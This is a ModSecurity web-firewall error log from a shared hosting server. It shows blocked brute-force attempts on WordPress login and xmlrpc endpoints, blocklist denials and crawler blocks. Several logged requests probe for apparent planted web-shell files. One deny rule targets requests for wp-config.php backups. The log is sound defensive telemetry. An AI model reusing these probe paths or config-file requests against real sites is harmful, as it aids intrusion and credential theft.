[Tue May 26 13:44:55.107839 2026] [security2:error] [pid 544395:tid 544551] [client 35.237.188.134:64947] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "plenitudotonal.com"] [uri "/xmlrpc.php"] [unique_id "ahVWfhmrs7g3RMCdp8XgtgAAABo"]
[Tue May 26 13:44:55.509455 2026] [security2:error] [pid 536875:tid 537014] [client 106.192.248.115:55286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWf-r_-FTveSGlx1H7fwAAAI4"]
[Tue May 26 13:44:55.509579 2026] [security2:error] [pid 536875:tid 537014] [client 106.192.248.115:55286] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWf-r_-FTveSGlx1H7fwAAAI4"]
[Tue May 26 13:44:56.124125 2026] [security2:error] [pid 544395:tid 544430] [remote 103.95.119.103:35954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVWfxmrs7g3RMCdp8XgyAAACyI"]
[Tue May 26 13:44:56.341115 2026] [security2:error] [pid 544395:tid 544437] [remote 216.185.214.209:34304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVWgBmrs7g3RMCdp8XgywAATik"]
[Tue May 26 13:44:58.151598 2026] [security2:error] [pid 536875:tid 537008] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWger_-FTveSGlx1H7mgAAAIg"]
[Tue May 26 13:44:59.637407 2026] [security2:error] [pid 544395:tid 544540] [client 104.164.173.136:10054] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVWgxmrs7g3RMCdp8XhGgAAAA8"]
[Tue May 26 13:45:00.440380 2026] [security2:error] [pid 536875:tid 537054] [client 104.164.173.136:9848] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVWhOr_-FTveSGlx1H77gAAALY"]
[Tue May 26 13:45:00.457310 2026] [security2:error] [pid 544395:tid 544557] [client 104.164.173.136:0] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVWhBmrs7g3RMCdp8XhLgAAACA"]
[Tue May 26 13:45:00.787600 2026] [security2:error] [pid 544395:tid 544584] [client 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-plain.php"] [unique_id "ahVWhBmrs7g3RMCdp8XhNwAAADs"], referer: www.google.com
[Tue May 26 13:45:00.802505 2026] [security2:error] [pid 544395:tid 544613] [client 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVWhBmrs7g3RMCdp8XhOgAAAFg"], referer: www.google.com
[Tue May 26 13:45:01.224890 2026] [security2:error] [pid 544395:tid 544631] [client 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/mcndgjha.php"] [unique_id "ahVWhRmrs7g3RMCdp8XhUQAAAGo"], referer: www.google.com
[Tue May 26 13:45:01.482391 2026] [ssl:error] [pid 536875:tid 537117] [client 3.233.59.216:52014] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname autodiscover.krishnawoodworks.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:45:01.672937 2026] [security2:error] [pid 544395:tid 544567] [client 129.222.147.134:30319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWhRmrs7g3RMCdp8XhbAAAACo"]
[Tue May 26 13:45:01.673075 2026] [security2:error] [pid 544395:tid 544567] [client 129.222.147.134:30319] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWhRmrs7g3RMCdp8XhbAAAACo"]
[Tue May 26 13:45:02.034827 2026] [security2:error] [pid 544395:tid 544611] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWhRmrs7g3RMCdp8XhXQAAAFY"]
[Tue May 26 13:45:02.504518 2026] [fcgid:warn] [pid 544395:tid 544621] (70014)End of file found: [client 104.164.173.136:9738] mod_fcgid: can't get data from http client
[Tue May 26 13:45:03.163108 2026] [security2:error] [pid 536875:tid 537031] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWhur_-FTveSGlx1H8JwAAAJ8"]
[Tue May 26 13:45:03.599398 2026] [security2:error] [pid 536875:tid 537058] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWh-r_-FTveSGlx1H8NQAAALo"]
[Tue May 26 13:45:03.603953 2026] [security2:error] [pid 536875:tid 537037] [client 14.175.229.118:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWh-r_-FTveSGlx1H8MgAAAKU"]
[Tue May 26 13:45:05.659586 2026] [security2:error] [pid 544395:tid 544604] [client 106.192.248.115:55593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWiRmrs7g3RMCdp8XiAAAAAE8"]
[Tue May 26 13:45:05.659719 2026] [security2:error] [pid 544395:tid 544604] [client 106.192.248.115:55593] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWiRmrs7g3RMCdp8XiAAAAAE8"]
[Tue May 26 13:45:05.818336 2026] [security2:error] [pid 544395:tid 544541] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWiRmrs7g3RMCdp8Xh-wAAABA"]
[Tue May 26 13:45:07.546154 2026] [security2:error] [pid 544395:tid 544606] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWixmrs7g3RMCdp8XiGQAAAFE"]
[Tue May 26 13:45:09.132006 2026] [security2:error] [pid 544395:tid 544646] [client 52.167.144.212:55603] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahVWixmrs7g3RMCdp8XiJAAAAHk"]
[Tue May 26 13:45:09.299406 2026] [security2:error] [pid 536875:tid 537072] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWjOr_-FTveSGlx1H8kAAAAMg"]
[Tue May 26 13:45:10.359045 2026] [security2:error] [pid 544395:tid 544445] [remote 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVWjhmrs7g3RMCdp8XiPwAAQjE"], referer: www.google.com
[Tue May 26 13:45:10.502614 2026] [security2:error] [pid 536875:tid 536882] [remote 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-plain.php"] [unique_id "ahVWjur_-FTveSGlx1H8pAAApQY"], referer: www.google.com
[Tue May 26 13:45:10.975924 2026] [security2:error] [pid 536875:tid 536960] [remote 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/nqxollwk.php"] [unique_id "ahVWjur_-FTveSGlx1H8qgAAo1Q"], referer: www.google.com
[Tue May 26 13:45:11.179919 2026] [security2:error] [pid 544395:tid 544618] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWjhmrs7g3RMCdp8XiSAAAAF0"]
[Tue May 26 13:45:11.773869 2026] [security2:error] [pid 544395:tid 544435] [remote 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVWjxmrs7g3RMCdp8XiWwAAXCc"]
[Tue May 26 13:45:11.823881 2026] [security2:error] [pid 536875:tid 537055] [client 20.206.67.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVWjur_-FTveSGlx1H8oAAAtwA"], referer: www.google.com
[Tue May 26 13:45:11.961093 2026] [security2:error] [pid 544395:tid 544419] [remote 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVWjxmrs7g3RMCdp8XiXAAAVRc"]
[Tue May 26 13:45:11.984208 2026] [security2:error] [pid 536875:tid 537080] [client 129.222.147.134:12400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWj-r_-FTveSGlx1H8sgAAANA"]
[Tue May 26 13:45:11.984352 2026] [security2:error] [pid 536875:tid 537080] [client 129.222.147.134:12400] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWj-r_-FTveSGlx1H8sgAAANA"]
[Tue May 26 13:45:12.145418 2026] [security2:error] [pid 544395:tid 544407] [remote 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVWkBmrs7g3RMCdp8XiZAAAZQs"]
[Tue May 26 13:45:12.333669 2026] [security2:error] [pid 544395:tid 544417] [remote 20.206.67.134:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "digitalgerminate.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVWkBmrs7g3RMCdp8XiZgAAKxU"]
[Tue May 26 13:45:13.447778 2026] [security2:error] [pid 536875:tid 537042] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWkOr_-FTveSGlx1H8vgAAAKo"]
[Tue May 26 13:45:14.470631 2026] [security2:error] [pid 544395:tid 544573] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWkhmrs7g3RMCdp8XihAAAADA"]
[Tue May 26 13:45:16.189719 2026] [security2:error] [pid 544395:tid 544591] [client 106.192.248.115:55903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWlBmrs7g3RMCdp8XioQAAAEI"]
[Tue May 26 13:45:16.194387 2026] [security2:error] [pid 544395:tid 544591] [client 106.192.248.115:55903] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWlBmrs7g3RMCdp8XioQAAAEI"]
[Tue May 26 13:45:16.718255 2026] [security2:error] [pid 544395:tid 544561] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWlBmrs7g3RMCdp8XiogAAACQ"]
[Tue May 26 13:45:17.508975 2026] [security2:error] [pid 536875:tid 536958] [remote 20.206.67.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVWler_-FTveSGlx1H8_QAAm1I"], referer: www.google.com
[Tue May 26 13:45:18.045486 2026] [security2:error] [pid 536875:tid 537024] [client 20.206.67.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "digitalgerminate.com"] [uri "/index.php"] [unique_id "ahVWler_-FTveSGlx1H9CAAAmAk"], referer: www.google.com
[Tue May 26 13:45:18.078442 2026] [security2:error] [pid 536875:tid 537066] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWler_-FTveSGlx1H9AAAAAMI"]
[Tue May 26 13:45:18.221754 2026] [security2:error] [pid 544395:tid 544587] [client 208.91.198.85:15834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.jhonweb.com"] [uri "/wp-cron.php"] [unique_id "ahVWlhmrs7g3RMCdp8XivQAAAD4"]
[Tue May 26 13:45:18.224305 2026] [security2:error] [pid 544395:tid 544557] [client 40.77.167.58:10208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahVWlRmrs7g3RMCdp8XivAAAACA"]
[Tue May 26 13:45:20.538246 2026] [security2:error] [pid 536875:tid 537061] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWmOr_-FTveSGlx1H9GAAAAL0"]
[Tue May 26 13:45:22.051496 2026] [security2:error] [pid 536875:tid 537102] [client 129.222.147.134:24325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWmur_-FTveSGlx1H9MAAAAOY"]
[Tue May 26 13:45:22.051621 2026] [security2:error] [pid 536875:tid 537102] [client 129.222.147.134:24325] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWmur_-FTveSGlx1H9MAAAAOY"]
[Tue May 26 13:45:22.559686 2026] [security2:error] [pid 544395:tid 544590] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWmhmrs7g3RMCdp8Xi9AAAAEE"]
[Tue May 26 13:45:24.292383 2026] [security2:error] [pid 536875:tid 537076] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWm-r_-FTveSGlx1H9UAAAAMw"]
[Tue May 26 13:45:25.283307 2026] [security2:error] [pid 536875:tid 536995] [remote 173.212.245.56:42786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVWner_-FTveSGlx1H9XgAAkXc"]
[Tue May 26 13:45:26.273084 2026] [security2:error] [pid 536875:tid 537054] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWner_-FTveSGlx1H9awAAALY"]
[Tue May 26 13:45:26.507848 2026] [security2:error] [pid 544395:tid 544609] [client 47.128.124.230:39164] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahVWnhmrs7g3RMCdp8XjMgAAAFQ"]
[Tue May 26 13:45:28.124195 2026] [security2:error] [pid 544395:tid 544578] [client 197.14.195.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWnxmrs7g3RMCdp8XjSQAAADU"]
[Tue May 26 13:45:29.083082 2026] [security2:error] [pid 544395:tid 544543] [client 129.204.200.196:43616] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVWoBmrs7g3RMCdp8XjZQAAABI"], referer: http://bloggertarget.com/e/data/images/arrow.gif
[Tue May 26 13:45:29.252778 2026] [security2:error] [pid 536875:tid 537050] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWoOr_-FTveSGlx1H9lwAAALI"]
[Tue May 26 13:45:30.120107 2026] [security2:error] [pid 536875:tid 537080] [client 106.192.248.115:56223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWoer_-FTveSGlx1H9qwAAANA"]
[Tue May 26 13:45:30.120248 2026] [security2:error] [pid 536875:tid 537080] [client 106.192.248.115:56223] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWoer_-FTveSGlx1H9qwAAANA"]
[Tue May 26 13:45:31.529259 2026] [security2:error] [pid 536875:tid 536928] [remote 47.128.50.178:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/robots.txt"] [unique_id "ahVWo-r_-FTveSGlx1H9wQAAwzQ"]
[Tue May 26 13:45:31.747200 2026] [security2:error] [pid 544395:tid 544624] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWoxmrs7g3RMCdp8XjigAAAGM"]
[Tue May 26 13:45:32.381264 2026] [security2:error] [pid 544395:tid 544526] [client 129.222.147.134:33107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWpBmrs7g3RMCdp8XjlQAAAAE"]
[Tue May 26 13:45:32.384870 2026] [security2:error] [pid 544395:tid 544526] [client 129.222.147.134:33107] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWpBmrs7g3RMCdp8XjlQAAAAE"]
[Tue May 26 13:45:33.584481 2026] [security2:error] [pid 536875:tid 537130] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWper_-FTveSGlx1H93gAAAQI"]
